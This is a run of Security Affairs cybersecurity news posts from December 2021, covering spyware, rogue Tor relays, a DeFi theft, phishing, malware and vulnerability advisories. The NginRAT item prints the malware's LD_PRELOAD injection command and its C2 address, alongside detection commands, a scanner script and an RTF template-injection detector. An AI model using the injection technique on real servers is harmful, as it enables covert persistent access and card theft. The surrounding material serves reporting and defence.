Yesterday, 3 December 2021: Security Affairs

NSO Group spyware used to compromise iPhones of 9 US State Dept officials

3 December 2021 at 21:17

Apple warns that the mobile devices of at least nine US Department of State employees were compromised with NSO Group's Pegasus spyware.

The iPhones of at least nine US state department officials were compromised with the NSO Group’s spyware Pegasus.

The US officials targeted by the surveillance software were either based in Uganda or focused on matters concerning the African country, revealed Reuters, which was not able to determine which NSO client orchestrated the attacks.

“Apple Inc iPhones of at least nine U.S. State Department employees were hacked by an unknown assailant using sophisticated spyware developed by the Israel-based NSO Group, according to four people familiar with the matter.” reads the post published by Reuters. “The intrusions, first reported here, represent the widest known hacks of U.S. officials through NSO technology.”

NSO Group told Reuters that it is not aware of the tools used in the attacks and added that it has canceled the relevant customer accounts; it nonetheless declared that it will investigate the incidents. NSO Group added that once the surveillance spyware is sold to a customer it has no way of knowing who that customer's targets will be.

NSO announced that it will cooperate with any relevant government authority to track down the attackers.

“If our investigation shall show these actions indeed happened with NSO’s tools, such customer will be terminated permanently and legal actions will take place,” said an NSO spokesperson, who added that NSO will also “cooperate with any relevant government authority and present the full information we will have.”

In early November, the U.S. sanctioned four companies for the development of surveillance malware or the sale of hacking tools used by nation-state actors, including NSO Group. NSO Group and Candiru were sanctioned for the development and sale of surveillance software used to spy on journalists and activists.

In November, Apple sued NSO Group and its parent company Q Cyber Technologies in a U.S. federal court for illegally targeting its customers with the surveillance spyware Pegasus.

According to the lawsuit, the surveillance firm is accountable for hacking into Apple’s iOS-based devices using zero-click exploits. The software developed by the surveillance firm was used to spy on activists, journalists, researchers, and government officials.

Apple also announced it would contribute $10 million to academic research into unmasking illegal surveillance activities.

“Apple today filed a lawsuit against NSO Group and its parent company to hold it accountable for the surveillance and targeting of Apple users. The complaint provides new information on how NSO Group infected victims’ devices with its Pegasus spyware. To prevent further abuse and harm to its users, Apple is also seeking a permanent injunction to ban NSO Group from using any Apple software, services, or devices.” reads the announcement published by Apple.

The legal action aims at permanently preventing the infamous company from breaking into any Apple software, services, or devices.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)

The post NSO Group spyware used to compromise iPhones of 9 US State Dept officials appeared first on Security Affairs.

KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays

3 December 2021 at 15:33

Since 2017, an unknown threat actor has run thousands of malicious Tor relay servers in the attempt to unmask Tor users.

A mysterious threat actor, tracked as KAX17, has run thousands of malicious Tor relay servers since 2017 in an attempt to deanonymize Tor users.

KAX17 ran relay servers in various positions within the Tor network, including entry and exit nodes. Researchers at the Tor Project removed hundreds of servers set up by the threat actor in October and November 2021.

In August 2020, the security researcher known by the moniker Nusenu revealed that in May 2020 a threat actor had managed to control roughly 23% of the entire Tor network's exit nodes. Experts warned that this was the first time a single actor had controlled such a large share of Tor exit nodes. A Tor exit relay is the final relay that Tor traffic passes through before it reaches its intended destination. Because the traffic leaves the network through these relays, the IP address of the exit relay is seen as the source of the traffic. Tor exit relays advertise their presence to the entire Tor network, so they can be used by any Tor user.

By controlling these relays it is possible to see which website a user connects to and, if an insecure connection is used, it is also possible to manipulate the traffic. In May 2020, the threat actor managed to control over 380 Tor exit nodes, with a peak on May 22, when it controlled 23.95% of Tor exit relays.

Nusenu told The Record that they have observed a resurgence of the phenomenon, associated with the same attacker.

“But a security researcher and Tor node operator going by Nusenu told The Record this week that it observed a pattern in some of these Tor relays with no contact information, which he first noticed in 2019 and has eventually traced back as far as 2017.” reads the post published by The Record. “Grouping these servers under the KAX17 umbrella, Nusenu says this threat actor has constantly added servers with no contact details to the Tor network in industrial quantities, operating servers in the realm of hundreds at any given point.”

Most of the Tor relay servers set up by the KAX17 actor were located in data centers all over the world and are configured as entry and middle points primarily. Nusenu pointed out that, unlike other threat actors he analyzed in the past, the KAX17 group only operates a small number of exit points.

This suggests that the group is operating to track Tor users within the anonymizing network; Nusenu also believes that KAX17 is an APT group.

Below are some insights on the KAX17 profile provided by the researcher in a post:

  • active since at least 2017
  • sophistication: non-amateur level and persistent
  • uses large amounts of servers across many (>50) autonomous systems (including non-cheap cloud hosters like Microsoft)
  • operated relay types: mainly non-exit relays (entry guards and middle relays) and to a lesser extent tor exit relays
  • (known) concurrently running relays peak: >900 relays
  • (known) advertised bandwidth capacity peak: 155 Gbit/s
  • (known) probability to use KAX17 as first hop (guard) peak: 16%
  • (known) probability to use KAX17 as second hop (middle) peak: 35%
  • motivation: unknown; plausible: Sybil attack; collection of tor client and/or onion service IP addresses; deanonymization of tor users and/or onion services

The expert states that the probability of connecting to a guard relay operated by KAX17 peaked at 16%, rising to 35% for the probability of passing through one of the middle relays set up by the threat actor.

“The following graph shows (known) KAX17's network fraction in % of the entire tor network for each position (first, second and last hop of a tor circuit) over the past 3 years.”

(Graph: KAX17 network fraction in % of the entire Tor network, by circuit position, over the past three years)

Nusenu has been sharing their findings with the Tor Project since last year, and the Tor security experts removed all the exit relays set up by the group in October 2020. The Tor Project also removed a set of KAX17 malicious relays between October and November 2021.

The expert also states that KAX17's poor OpSec revealed the use of an email address in the relays' ContactInfo field, but its authenticity cannot be determined, and a false flag cannot be excluded.

“Detecting and removing malicious tor relays from the network has become an impractical problem to solve. We presented a design and proof of concept implementation towards better self-defense options for tor clients to reduce their risk from malicious relays without requiring their detection.” concludes the researcher.


Threat actors stole $120 M in crypto from BadgerDAO DeFi platform

3 December 2021 at 12:16

Threat actors stole $120 million in cryptocurrencies from multiple wallets connected to the decentralized finance platform BadgerDAO.

This week threat actors hacked the decentralized finance platform BadgerDAO and stole $120.3 million in crypto funds, blockchain security firm PeckShield reported. Most of the stolen funds, over $117 million, were Bitcoin, while the rest of the stolen assets were held in the form of interest-bearing Bitcoin, a form of tokenised Bitcoin, and Ether.

BadgerDAO is a decentralised autonomous organisation (DAO) that allows users to bridge their Bitcoin into other blockchains.

Here is the current whereabouts as well as the total loss: $120.3M (with ~2.1k BTC + 151 ETH) @BadgerDAO pic.twitter.com/fJ4hJcMWTq

— PeckShield Inc. (@peckshield) December 2, 2021

The attackers were able to inject a malicious script into the UI of the BadgerDAO website that allowed them to intercept and hijack Web3 transactions. The funds were redirected to a wallet under the control of the attackers.

Peckshield was able to track the stolen funds:

Here is the list of funds that were so far transferred out from victims @BadgerDAO pic.twitter.com/P5pOj1YQ2l

— PeckShield Inc. (@peckshield) December 2, 2021

The malicious script was injected as early as November 10th, but the threat actors ran it at random intervals to avoid detection. BadgerDAO notified US and Canadian authorities and is investigating the security breach with the help of forensics firm Chainalysis.

Badger has received reports of unauthorized withdrawals of user funds.

As Badger engineers investigate this, all smart contracts have been paused to prevent further withdrawals.

Our investigation is ongoing and we will release further information as soon as possible.

— ₿adgerDAO 🦡 (@BadgerDAO) December 2, 2021

The investigation continues.

Badger has retained data forensics experts Chainalysis to explore the full scale of the incident & authorities in both the US & Canada have been informed & Badger is cooperating fully with external investigations as well as proceeding with its own.

— ₿adgerDAO 🦡 (@BadgerDAO) December 2, 2021

Once Badger discovered the unauthorized transfers, it paused all smart contracts; it also advised users to decline all transactions to addresses that are under the control of the attackers.

According to The Verge, Badger is investigating how the threat actors gained access to Cloudflare via an API key that should have been protected by two-factor authentication.

“While the attack didn’t reveal specific flaws within Blockchain tech itself, it managed to exploit the older “web 2.0” technology that most users need to use to perform transactions. Multi-factor authentication systems protect our accounts against many phishing schemes or bulk credential stuffing attacks. Still, experts have repeatedly warned about targeted phishing attacks that can bypass it, while toolkits to automate the process have been available for years.” reported The Verge.

“All [the] blockchain / smart contract audits in the world, and people lose 120m to a Cloudflare API leak by a sloppy team where a dude passes a new approval to his contract in the site header – GG – we still have a long way to go.” A member of the team said, “I’m sure we will have some mitigation procedures proposed after this.” reads the comment of a user within Badger’s Discord.

DeFi platforms are under attack: according to a report published by AtlasVPN in August, DeFi hacks accounted for 76% of all hacks between January and July 2021. The report states that over $129 million was stolen in DeFi attacks in 2020.


Watch out for Omicron COVID-19-themed phishing messages!

3 December 2021 at 08:45

Threat actors have started to exploit the interest in the Omicron COVID-19 variant and are using it as a lure in phishing campaigns.

Crooks have already started exploiting the interest in the Omicron COVID-19 variant and are using it as a lure in phishing attacks.

People are interested in the spread of the new variant, the efficacy of the vaccines and the measures that states will adopt to contain it, and threat actors are attempting to take advantage of this situation.

An Omicron COVID-19-themed campaign was spotted by UK authorities, and the National Health Service (NHS) is warning about these phishing attacks.

⚠ SCAM OMICRON PCR EMAILS ⚠

Beware of fake NHS emails asking you to order a Omicron PCR test.

Link goes to a fake NHS website.

The NHS will:

❌NEVER ask for payment – the vaccine is free
❌NEVER ask for your bank details

Forward emails to [email protected] pic.twitter.com/GcGB3C5dLI

— Norfolk County Council Trading Standards (@NorfolkCCTS) November 30, 2021

@ukhsa advise of a #SCAM doing the rounds on social media purporting to offer #Omicron #PCRs #tscovid19

This has been reported & will be taken down but it is likely there will be more instances before it is removed, & there are reports of people querying it at test sites. pic.twitter.com/IXZ1qPStq5

— Dudley EHO – Play your part – #protectDudley (@myDudleyEHO) December 1, 2021

These phishing messages offer a free Omicron PCR test that will allegedly allow recipients to avoid restrictions. One of the samples shared by the UK consumer protection organization ‘Which?’ and published by BleepingComputer was sent from the address ‘[email protected]’ in an attempt to make the emails more credible.

Upon clicking the link embedded in the message, recipients are redirected to a fake NHS website where they are asked to apply for a “COVID-19 Omicron PCR test.”

The recipients have to fill in a form with their personal data (name, date of birth, home address, mobile phone number, and email address), answer some security questions (e.g. mother’s maiden name), and finalize the procedure by making a payment of £1.24 ($1.65).

Clearly, the scammers aim at stealing the payment details of the recipients while making the payment.

Authorities are urging citizens to be wary of suspicious emails or text messages asking for financial details (e.g. credit card or banking data). The NHS never asks for financial details in legitimate email correspondence.

“The NHS will: NEVER ask for payment – the vaccine is free NEVER ask for your bank details.”

Users who receive suspicious messages can report them to “[email protected]”.


Before yesterday: Security Affairs

CISA adds Zoho, Apache, Qualcomm, Mikrotik flaws to the list of actively exploited issues

2 December 2021 at 20:17

U.S. CISA urges federal agencies to address vulnerabilities in Qualcomm, Mikrotik, Zoho and Apache Software Foundation software.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its catalog of actively exploited vulnerabilities, directing federal agencies to address flaws in Qualcomm, Mikrotik, Zoho and Apache Software Foundation software within specific deadlines.

CISA also warns of the risk to the federal enterprise from delays in addressing these vulnerabilities.

The US Agency requests the Federal agencies to apply security patches for Zoho ManageEngine ServiceDesk flaws by December 15, 2021. The two flaws added to the catalog are the CVE-2021-37415 Zoho ManageEngine ServiceDesk authentication bypass vulnerability and the CVE-2021-44077 Zoho ManageEngine ServiceDesk Plus remote code execution.

Both issues have been actively exploited by nation-state actors over the last few months.

CISA also urges agencies to address the CVE-2018-14847 MikroTik RouterOS directory traversal vulnerability by June 1, 2022.

Another flaw added to the catalog is the CVE-2021-40438 Apache HTTP Server-Side Request Forgery (SSRF) vulnerability that must be addressed by December 15, 2021. A few days ago, the German Cybersecurity Agency and Cisco warned of attacks exploiting the recently patched CVE-2021-40438 flaw in Apache HTTP servers.

The German BSI agency published an alert about this vulnerability, stating that it is aware of at least one attack exploiting the flaw.

The fifth issue added to the list of actively exploited vulnerabilities is CVE-2020-11261, an improper input validation flaw that impacts multiple Qualcomm chipsets. This vulnerability must be addressed by June 1, 2022.

Google warned that the Qualcomm vulnerability was exploited by threat actors in limited, targeted attacks.

“There are indications that CVE-2020-11261 may be under limited, targeted exploitation” reads a note added to the January security bulletin last week.

The CVE-2020-11261 flaw was reported to Qualcomm by Google’s Android Security team on August 20, 2020 and was addressed in January 2021.


Russian internet watchdog Roskomnadzor bans six more VPN services

2 December 2021 at 17:38

Russia’s internet watchdog, ‘Roskomnadzor’, has announced a ban on further VPN products; 15 VPN services are now illegal in Russia.

Russian communications watchdog Roskomnadzor has tightened its control over the Internet and blocked access to six more VPN services. The latest banned services are Betternet, Lantern, X-VPN, Cloudflare WARP, Tachyon VPN and PrivateTunnel.

The total number of banned VPN products reached 15, below is the full list of blocked services:

  • Hola! VPN
  • ExpressVPN
  • KeepSolid VPN Unlimited
  • Nord VPN
  • Speedify VPN
  • IPVanish VPN
  • VyprVPN
  • Opera VPN
  • ProtonVPN
  • Betternet
  • Lantern
  • X-VPN
  • Cloudflare WARP
  • Tachyon VPN
  • PrivateTunnel

Russia’s internet watchdog sent a request that the Center for Monitoring and Control of the Public Communications Network be informed about the ban of these services from the systems of all registered Russian companies and public organizations.

The companies were banned because they did not comply with Roskomnadzor's demand to connect their systems to the Federal State Information System (FGIS).

In September Russian communications watchdog Roskomnadzor blocked access to Hola!VPN, ExpressVPN, KeepSolid VPN Unlimited, Nord VPN, Speedify VPN, and IPVanish VPN.

The Russian communications watchdog argued that VPNs could be abused for illegal activities online, including terrorism and child pornography. However, the watchdog made some exceptions for companies that rely on VPNs for their operations; for this reason, the regulator created a white list of software and apps that will be able to continue using VPN providers.

Russians ordinarily use VPN services and other anonymizing services to access blocked content and bypass censorship; the following graph shows the continuous growth in the number of Tor users in Russia.

(Graph: number of Tor users in Russia over time)

In 2017, Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites, and the Duma approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

The bill prohibited the use of any service from the Russian territory if they could be used to access blacklisted websites.

VPN operators and proxy services operating in the country must register themselves with the government regulatory authority.

Since May 3rd, 2018, Russia’s media and communication regulatory authority Roskomnadzor has blocked over 50 virtual private networks (VPNs), web proxies and anonymizing networks.


NginRAT – A stealth malware targets e-store hiding on Nginx servers

2 December 2021 at 16:18

Threat actors are targeting e-stores with remote access malware, dubbed NginRAT, that hides on Nginx servers bypassing security solutions.

Researchers from security firm Sansec recently discovered a new Linux remote access trojan (RAT), tracked as CronRAT, that hides in the Linux task scheduling system (cron) as a task scheduled on the non-existent date of February 31st.

CronRAT is employed in Magecart attacks against online stores and enables attackers to steal credit card data by deploying online payment skimmers on Linux servers.

While investigating CronRAT infections in North America and Europe, the researchers spotted a new malware, dubbed NginRAT, that hides on Nginx servers and bypasses security solutions. Like CronRAT, NginRAT works as a “server-side Magecart”: it injects itself into an Nginx process.

Experts pointed out that a rogue Nginx process cannot be distinguished from a legitimate one.

“NginRAT essentially hijacks a host Nginx application to masquerade its presence. To do that, NginRAT modifies core functionality of the Linux host system. When the legitimate Nginx web server uses such functionality (eg dlopen), NginRAT injects itself. The result is a remote access trojan that is embedded in the Nginx process.” reads the analysis published by the experts. “On a typical eCommerce web server, there are many Nginx processes. And the rogue Nginx looks just like the others.”

The researchers discovered that NginRAT is delivered using CronRAT and both allow attackers to maintain remote access to the infected system.

In the infection process, CronRAT contacts the command and control server at 47.115.46.167:443 using custom commands. One of the commands, dwn, downloads a Linux shared library to /dev/shm/php-shared. Then CronRAT launches

env LD_L1BRARY_PATH="[580 bytes]" \
    LD_PRELOAD=/dev/shm/php-shared \
    /usr/sbin/nginx --help --help --help --help --help --help --help --help \
    --help --help --help --help --help --help --help --help --help --help --help \
    --help --help --help --help --help --help --help --help --help --help --help \
    --help --help --help --help --help --help --help --help --help --help --help \
    --help --help --help --help --help --help --help --help --help 1>&2 &

to inject the NginRAT into the host Nginx application.


“Once Nginx calls dlopen, NginRAT takes control. It removes the php-shared file, changes its process name to nginx: worker process, gathers information about the system and opens up a connection with the c&c server at 47.115.46.167. It then awaits further commands, possibly sleeping for weeks or months.” continues the post published by the researchers.

Experts explained that because NginRAT hides inside a legitimate Nginx host process, /proc/PID/exe points to Nginx. Another trick that makes analysis of the malware challenging is that the library code exists only in memory and cannot be examined after launch, since the file on disk is removed. The use of LD_L1BRARY_PATH (with the typo) is an indicator of compromise.

In order to find malicious processes, admins can run this command:

$ sudo grep -al LD_L1BRARY_PATH /proc/*/environ | grep -v self/
/proc/17199/environ
/proc/25074/environ

Then it is possible to kill them with kill -9 <PID>.
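A fuller version of that sweep, written here as an added example rather than Sansec's tooling or the article's own one-liner: it checks each process environment for both launch-time indicators the article names (the misspelled LD_L1BRARY_PATH variable and an LD_PRELOAD pointing into /dev/shm) and prints the PID, the executable the process really is and its command line, so an operator can confirm a hit before killing anything. The optional proc-root argument is a hypothetical parameter added so the scan can be run against a constructed copy of /proc; by default it reads the live /proc.

```shell
#!/bin/sh
# Added example, not code from Sansec or Security Affairs.
# Scan per-process environment blocks for the NginRAT launch indicators
# described in the article and report what was found, without killing.

# scan_nginrat_env [PROC_ROOT]
#   PROC_ROOT is a hypothetical parameter: a directory laid out like /proc
#   (PID/environ, PID/exe, PID/cmdline). Defaults to the real /proc.
#   Output: one tab-separated line per hit: PID, indicators, exe, cmdline.
scan_nginrat_env() {
    proc_root="${1:-/proc}"
    # numeric directories only, which also skips /proc/self as the article does
    for envfile in "$proc_root"/[0-9]*/environ; do
        # an unreadable entry or an unmatched glob is simply skipped
        [ -r "$envfile" ] || continue
        pid_dir=$(dirname "$envfile")
        pid=$(basename "$pid_dir")
        # environ is NUL-separated; turn it into lines so anchors match one
        # variable at a time, then keep only the indicator variable names
        hits=$(tr '\0' '\n' < "$envfile" \
               | grep -E '^(LD_L1BRARY_PATH=|LD_PRELOAD=/dev/shm/)' \
               | cut -d= -f1 | sort -u | tr '\n' ',')
        [ -n "$hits" ] || continue
        # /proc/PID/exe still resolves to the real binary (nginx for NginRAT)
        exe=$(readlink "$pid_dir/exe" 2>/dev/null || echo '?')
        cmd=$(tr '\0' ' ' < "$pid_dir/cmdline" 2>/dev/null | sed 's/ $//' || true)
        printf '%s\t%s\t%s\t%s\n' "$pid" "${hits%,}" "$exe" "$cmd"
    done
}

# count_nginrat_hits [PROC_ROOT]: number of suspicious processes (0 when clean)
count_nginrat_hits() {
    scan_nginrat_env "$1" | awk 'END { print NR }'
}

# Stand-alone use: list hits on this host, then exit non-zero if any were found
if [ "${NGINRAT_SCAN_MAIN:-0}" = 1 ]; then
    scan_nginrat_env
    [ "$(count_nginrat_hits)" -eq 0 ]
fi
```

Run with NGINRAT_SCAN_MAIN=1 to scan the live system; the exit status is non-zero when at least one process carries an indicator.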


Europol arrested 1800 money mules as part of an anti-money-laundering operation

2 December 2021 at 09:46

Europol identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7.

Europol has identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7.

The operation is the result of a joint effort of 27 countries, Eurojust, INTERPOL, the European Banking Federation (EBF), and the FinTech FinCrime Exchange.

The name EMMA is an acronym for European Money Mule Action; the first EMMA operation led by Europol took place in 2016.

The EMMA 7 operation was conducted between September 15 and November 30, 2021, with the contribution of law enforcement agencies from Australia, Austria, Belgium, Bulgaria, Colombia, Czech Republic, Estonia, Finland, Greece, Germany, Hong Kong, Hungary, Ireland, Italy, Moldova, Netherlands, Poland, Portugal, Romania, Singapore, Slovak Republic, Slovenia, Sweden, Switzerland, Spain, United Kingdom and United States.

The money mules have a crucial role in criminal organizations to launder money for a wide array of illegal activities, such as online scams, sim-swapping, e-commerce fraud, and phishing. Money mules receive and transfer money on behalf of crooks in exchange for a small fee.

“The operation resulted in 1 803 arrests and the identification of over 18 000 money mules.” reads the press release published by Europol. “It also revealed that money mules were being used to launder money for a wide array of online scams such as sim-swapping, man in the middle attacks, e-commerce fraud and phishing.”


The authorities conducted 2,503 individual investigations, and the operation prevented losses of €67.5 million by stopping 7,000 reported fraudulent transactions. According to Europol, around 400 banks and financial institutions supported the operation.

Another important result was the identification of 324 recruiters.

Europol pointed out that money mules can be recruited unknowingly into the criminal operation. Groups of individuals such as students, immigrants, and people in economic distress, are a privileged target of recruiters that offer them easy money. Recruiters leverage multiple channels, such as legitimate-looking job adverts and social media posts.

“Ignorance is not an excuse when it comes to the law and money muling; they are breaking the law by laundering the illicit proceeds of crime. For this reason, Europol coordinated the ‘#DontBeAMule’ awareness campaign with all participant countries, law enforcement and the EBF on behalf of the European banks, as a means to prevent more innocent bystanders being exploited by criminals and putting themselves at risk.” concludes the press release.


Mozilla fixes critical flaw in Network Security Services (NSS) cryptography library

2 December 2021 at 05:26

Mozilla fixed a critical memory corruption issue affecting its cross-platform Network Security Services (NSS) set of cryptography libraries.

Mozilla has addressed a heap-based buffer overflow vulnerability (CVE-2021-43527) in its cross-platform Network Security Services (NSS) set of cryptography libraries.

Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. Applications using NSS can support SSL v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards.

The flaw lies in the way the libraries handle DER-encoded DSA or RSA-PSS signatures, for example in email clients and PDF viewers using vulnerable NSS versions. The vulnerability was discovered by Project Zero researcher Tavis Ormandy.

“The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys. The question is, what happens if you just…. make a signature that’s bigger than that? Well, it turns out the answer is memory corruption.” wrote Ormandy.

“The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data. The bug is simple to reproduce and affects multiple algorithms.”

“We believe all versions of NSS since 3.14 (released October 2012) are vulnerable” Ormandy added.

This is a major memory corruption flaw in NSS, almost any use of NSS is affected. The Mozilla advisory is here https://t.co/AL8suyLQFF https://t.co/uTQ2gqRZ5t

— Tavis Ormandy (@taviso) December 1, 2021

The vulnerability affects NSS versions 3.68.1 and NSS 3.73 and doesn’t impact Mozilla Firefox. The flaw was addressed with the release of NSS 3.73.0. Ormandy recommends that vendors of products using NSS update the library.

“Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS #7, or PKCS #12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS.” reads the security advisory published by Mozilla.

NSS is used by many companies, including AOL, Red Hat, and Google. The list of products using the library:


VirusTotal Collections allows enhancing the sharing of Indicators of Compromise (IoCs)

1 December 2021 at 19:37

VirusTotal announced VirusTotal Collections, a new service that allows security researchers to share sets of Indicators of Compromise (IoCs).

VirusTotal announced VirusTotal Collections, a new service that allows threat researchers to share Indicators of Compromise (IoCs).

A collection is a live report that includes IoCs associated with a specific threat and it is available for VirusTotal registered users. The reports will also include up-to-date VirusTotal analysis metadata.

“A collection is a live report which contains a title, a group of IoCs (file hashes, URLs, domains and IP addresses) and an optional description. Collections are open to our VirusTotal Community (registered users) and they will be enhanced with VirusTotal analysis metadata providing the latest information we have for the IoCs, along with some aggregated tags.” reads the announcement published by Virus Total.

Registered VirusTotal users will be able to add or remove IoCs to/from the reports.

Security experts often use sharing platforms like Pastebin to share IoCs with the community; now they have a dedicated platform to do so, which is also integrated with the information from VirusTotal. Users can create IoC collections on the VirusTotal home page, under the SEARCH tab.


VirusTotal Collections is accessible via the UI and the API, and it also allows a report to be shared through a permalink that can easily be embedded in blog posts and third-party reports.

“All our community generated content, including comments, graphs and collections will contribute to the Community section of file, URL, domain and IP address reports. This means that if a security researcher creates a Collection with a file in it, if you visit the file report you will see the collection in the community section,” VirusTotal adds.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Collections)

The post VirusTotal Collections allows enhancing the sharing of Indicators of Compromise (IoCs) appeared first on Security Affairs.

New RTF Template Inject technique used by APT groups in recent attacks

1 December 2021 at 15:11

Nation-state actors from China, India, and Russia, were spotted using a novel RTF template injection technique in recent attacks.

APT groups from China, India, and Russia have used a new RTF (rich text format) template injection technique in recent phishing attacks.

The technique was first reported by the security firm Proofpoint, which has observed phishing campaigns using weaponized RTF template injection since March 2021. The experts believe that nation-state actors will continue to use the technique in future campaigns.

The RTF template injection technique abuses legitimate RTF template functionality: by subverting the document formatting properties of the file, it retrieves a malicious payload from a remote server instead of a local file resource via the RTF template control word. The feature abused by attackers allows an RTF template to be loaded from a URL instead of a local file, so threat actors simply replace a legitimate file destination with a malicious download link.

Experts pointed out that the technique has a lower detection rate by public antivirus engines when compared to the Office-based template injection technique.

“Proofpoint has identified distinct phishing campaigns utilizing the technique which have been attributed to a diverse set of APT threat actors in the wild. While this technique appears to be making the rounds among APT actors in several nations, Proofpoint assesses with moderate confidence, based on the recent rise in its usage and the triviality of its implementation, that it could soon be adopted by cybercriminals as well.” reads the analysis published by ProofPoint.

“By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination.”

In the attacks observed by the researchers, threat actors used Unicode signed character notation to obfuscate the URL value included in the RTF file. The trick was used in an attempt to evade static detection signatures in anti-virus engines.

RTF template injection technique

The attack also works with .doc.rtf files opened in Microsoft Word. When an RTF remote template injection file is opened with MS Word, the application retrieves the resource from the specified URL before displaying the content of the file.
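As an added example (not Proofpoint's code or its YARA signatures), the following Python scanner extracts the `\*\template` destination from an RTF file, decodes the signed Unicode notation used to hide the URL, and flags any destination that points at a remote resource. It assumes the common `\uc1` setting with a single `?` fallback character; the sample documents are constructed and use documentation address space.

```python
"""Detection logic for RTF template injection (added example, not Proofpoint's).

Looks for the {\\*\\template ...} destination the article describes, decodes
the \\uN "signed Unicode" notation (and \\'hh hex escapes) used to hide the
URL, and flags any destination that resolves to a remote resource.
Assumption: \\uc1 with a single '?' fallback byte, the common form.
"""
from __future__ import annotations

import re

# {\*\template <destination>}: the destination should be a local file, but
# Word will also fetch it from a URL, which is the injection the report covers.
TEMPLATE_DEST = re.compile(rb"\{\\\*\\template\b([^{}]*)\}", re.DOTALL)
# \uN: code point as a signed 16-bit decimal, optionally followed by '?' fallback
UNICODE_ESC = re.compile(r"\\u(-?\d+) ?\??")
# \'hh: 8-bit code-page escape
HEX_ESC = re.compile(r"\\'([0-9a-fA-F]{2})")
# any other control word (\uc1, \par ...) sprinkled into the destination
CONTROL_WORD = re.compile(r"\\[a-zA-Z]+-?\d* ?")
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def decode_rtf_text(raw: str) -> str:
    """Turn the raw destination text into the string Word would resolve."""
    def unicode_char(m: re.Match) -> str:
        code = int(m.group(1))
        if code < 0:            # RTF stores U+8000..U+FFFF as negative numbers
            code += 0x10000
        return chr(code)

    text = UNICODE_ESC.sub(unicode_char, raw)
    text = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = CONTROL_WORD.sub("", text)
    return text.strip().strip('"')


def extract_template_targets(rtf: bytes) -> list[str]:
    """Every decoded \\*\\template destination found in the document."""
    return [decode_rtf_text(m.group(1).decode("latin-1"))
            for m in TEMPLATE_DEST.finditer(rtf)]


def is_remote_template(target: str) -> bool:
    return target.lower().startswith(REMOTE_SCHEMES)


def scan_rtf(rtf: bytes) -> list[str]:
    """Remote template destinations found; an empty list means no injection."""
    return [t for t in extract_template_targets(rtf) if is_remote_template(t)]


def to_signed_unicode(s: str) -> str:
    """Encode a string in \\uN? notation; used here only to build a sample."""
    return "".join(f"\\u{ord(c)}?" for c in s)


# Constructed samples, not real malware; 203.0.113.0/24 is documentation space.
LOCAL_RTF = b"{\\rtf1\\ansi{\\*\\template Normal.dotm}Quarterly report}"
PLAIN_RTF = b"{\\rtf1\\ansi{\\*\\template http://203.0.113.10/tmpl.dotm}Invoice}"
OBFUSCATED_RTF = (b"{\\rtf1\\ansi\\uc1{\\*\\template "
                  + to_signed_unicode("https://203.0.113.10/t.dotm").encode()
                  + b"}Agenda}")

if __name__ == "__main__":
    for name, doc in (("local", LOCAL_RTF), ("plain", PLAIN_RTF),
                      ("obfuscated", OBFUSCATED_RTF)):
        hits = scan_rtf(doc)
        print(f"{name:11s} {'REMOTE TEMPLATE ' + hits[0] if hits else 'ok'}")
```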

Proofpoint reported that it observed the technique being used by the DoNot Team, Gamaredon, and TA423 APT groups.


“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector. The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide.” concludes the report. “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”

Proofpoint shared YARA signatures for the attacks using this technique.

Pierluigi Paganini

FBI training document shows lawful access to multiple encrypted messaging apps

1 December 2021 at 09:57

Which are the most secure encrypted messaging apps? An FBI document shows what data can be obtained from them.

The Record shared an FBI training document that reveals the surveillance capabilities of US law enforcement, detailing which data can be extracted from encrypted messaging apps.

The document analyzes lawful access to multiple encrypted messaging apps, including iMessage, Line, Signal, Telegram, Threema, Viber, WhatsApp, WeChat, and Wickr.

Source Property of the People

The above document, dated to January 7, 2021, was obtained through a FOIA request filed by the US nonprofit organization Property of the People.

We got an FBI training doc on obtaining data from secure messaging apps, and shared it w/ @AndyKroll/@RollingStone. #FOIA https://t.co/FcjEUV1sN3

— PropertyOfThePeople (@PropOTP) November 29, 2021

“As of November 2020, the FBI’s ability to legally access secure content on leading messaging applications is depicted below, including details on accessible information based on the applicable legal process. Return data provided by the companies listed below, with the exception of WhatsApp, are actually logs of latent data that are provided to law enforcement in a non-real-time manner and may impact investigations due to delivery delays.” reads the document.

The information reported in the training document provides an up-to-date picture of law enforcement's ability to access the content of popular messaging apps.

Feds cannot access the message content for Signal, Telegram, Threema, Viber, WeChat, and Wickr, while they can gain limited access to the content of encrypted communications from iMessage, Line, and WhatsApp.

However, depending on the app, law enforcement can still obtain varying amounts of metadata that could allow end users to be unmasked.

Pierluigi Paganini

Sabbath Ransomware target critical infrastructure in the US and Canada

1 December 2021 at 07:25

Sabbath ransomware is a new threat that has been targeting critical infrastructure in the United States and Canada since June 2021.

A new ransomware group called Sabbath (aka UNC2190) has been targeting critical infrastructure in the United States and Canada since June 2021. According to Mandiant researchers, the group is a rebrand of the Arcane and Eruption gangs.

